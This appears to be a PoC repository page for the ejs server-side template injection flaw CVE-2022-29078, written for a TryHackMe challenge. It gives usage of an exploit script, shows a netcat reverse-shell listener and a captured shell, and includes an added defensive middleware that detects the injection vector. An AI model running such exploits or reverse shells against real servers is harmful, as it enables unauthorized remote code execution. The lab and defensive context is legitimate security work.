POC details: e7c59e1824393d0314e79acfe22e09d8f93ed8cb

Source
Related vulnerability
Title: GitHub ejs code injection vulnerability (CVE-2022-29078)
Description: GitHub ejs is an embedded JavaScript template engine. ejs version 3.1.6 contains a code injection vulnerability that stems from server-side template injection via settings[view options][outputFunctionName]. This value is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is executed when the template is compiled.
Description
Server-side Template Injection (SSTI) RCE - THM challenge "whiterose"
Introduction
<h1 align="center">
  THM Challenge SSTI exploit
</h1>

<p align="center">
    <img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2022-29078&label=Visitors&countColor=%2337d67a" />
    <a href="https://www.facebook.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Facebook-%231877F2.svg?style=for-the-badge&logo=Facebook&logoColor=white" alt="Facebook">
    </a>
      <a href="https://www.twitter.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Twitter-%23000000.svg?style=for-the-badge&logo=X&logoColor=white" alt="X">
    </a>
    <a href="https://medium.com/@l0n3m4n">
        <img src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white" alt="Medium">
    </a>
    <a href="https://www.python.org/">
    <img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
    </a>
    <a href="https://www.kali.org/">
    <img src="https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white" alt="Kali">      
    </a>
</p>

<h1 align="center">
    <img src="whiterose.jpeg" alt="whiterose" style="display: block; margin: auto;" />
</h1>


## 📜 Description 
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
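As an added example that is not part of this PoC repository or of ejs itself: a request-parameter check for Express applications that pass request data into ejs. The vector named above, settings[view options][outputFunctionName], reaches the template engine as a nested object once Express has parsed the query string, so the detector walks the parsed parameters and reports any request that tries to reach render options that way, and it also tests that a would-be outputFunctionName is a plain JS identifier. The option key list, the function names and the sample query are this example's own assumptions.

```javascript
// Added example (not the PoC's or ejs's code): flag request parameters that
// try to set ejs render options through settings['view options'] (the
// CVE-2022-29078 vector) before they reach res.render().

// Render options a request must never be allowed to set (assumed list).
const RENDER_OPTION_KEYS = new Set([
  'outputFunctionName', 'localsName', 'destructuredLocals', 'escapeFunction',
  'client', 'delimiter', 'openDelimiter', 'closeDelimiter',
]);

// A generated function name has to be a plain JavaScript identifier;
// anything else would be spliced into the compiled template source.
const JS_IDENTIFIER = /^[a-zA-Z_$][0-9a-zA-Z_$]*$/;

// Walk a parsed query/body object and return findings as {path, reason}.
function findEjsOptionInjection(params, path = []) {
  const findings = [];
  if (params === null || typeof params !== 'object') return findings;
  for (const [key, value] of Object.entries(params)) {
    const here = [...path, key];
    if (key === 'settings' || key === 'view options') {
      findings.push({ path: here.join('.'), reason: 'request attempts to set view settings' });
    }
    if (RENDER_OPTION_KEYS.has(key)) {
      const badName = key === 'outputFunctionName'
        && typeof value === 'string' && !JS_IDENTIFIER.test(value);
      findings.push({
        path: here.join('.'),
        reason: badName ? 'outputFunctionName is not a valid JS identifier'
                        : 'request attempts to set ejs render option',
      });
    }
    findings.push(...findEjsOptionInjection(value, here)); // recurse into nested objects
  }
  return findings;
}

// Express-style middleware (assumed shape): reject the request instead of rendering.
function rejectEjsOptionInjection(req, res, next) {
  const findings = [
    ...findEjsOptionInjection(req.query || {}),
    ...findEjsOptionInjection(req.body || {}),
  ];
  if (findings.length > 0) {
    return res.status(400).json({ error: 'invalid parameters', findings });
  }
  return next();
}

// Constructed sample: what Express's query parser produces for
// ?settings[view options][outputFunctionName]=x;notAnIdentifier&name=alice
const SAMPLE_QUERY = {
  settings: { 'view options': { outputFunctionName: 'x;notAnIdentifier' } },
  name: 'alice',
};
```

Mount the middleware ahead of any route that spreads req.query or req.body into the render call; upgrading ejs beyond 3.1.6 remains the actual fix.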

## 📚 Table of Contents
- 📜 [Description](#-description)
- 🛠️ [Installation and Usage](#-installation-and-usage)
- [Output](#output)
- [Netcat listener](#netcat-listener)
- 💁 [References](#-references)

## 🛠️ Installation and Usage
```bash
$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git && pip install colorama && cd CVE-2022-29078
```
```bash
$ python3 CVE-2022-29078.py -h

  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose


usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD

Send a crafted POST request with custom URL, username, and password.

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target URL (e.g., http://admin.cyprusbank.thm/settings)
  -u USER, --user USER  Username to send in the request
  -p PASSWORD, --password PASSWORD
                        Password to send in the request

Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd 
```

## Output
```bash
  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose

[+] Payload delivered successfully. Awaiting reverse shell connection...
```
## Netcat listener
```bash
$ sudo rlwrap -cAr nc -lvnp 443                                   
[sudo] password for l0n3m4n: 
listening on [any] 443 ...
connect to [10.2.4.61] from (UNKNOWN) [10.10.145.199] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
web@cyprusbank:~/app$ 
```

## 💁 References
- https://github.com/mde/ejs/issues/720
- https://github.com/projectdiscovery/nuclei-templates/main/http/cves/2022/CVE-2022-29078.yaml
- https://github.com/mde/ejs/releases
- https://eslam.io/posts/ejs-server-side-template-injection-rce
- https://security.netapp.com/advisory/ntap-20220804-0001
File snapshot

```text
[4.0K] /data/pocs/e7c59e1824393d0314e79acfe22e09d8f93ed8cb
├── [3.7K] CVE-2022-29078.py
├── [4.3K] README.md
└── [ 31K] whiterose.jpeg

0 directories, 3 files
```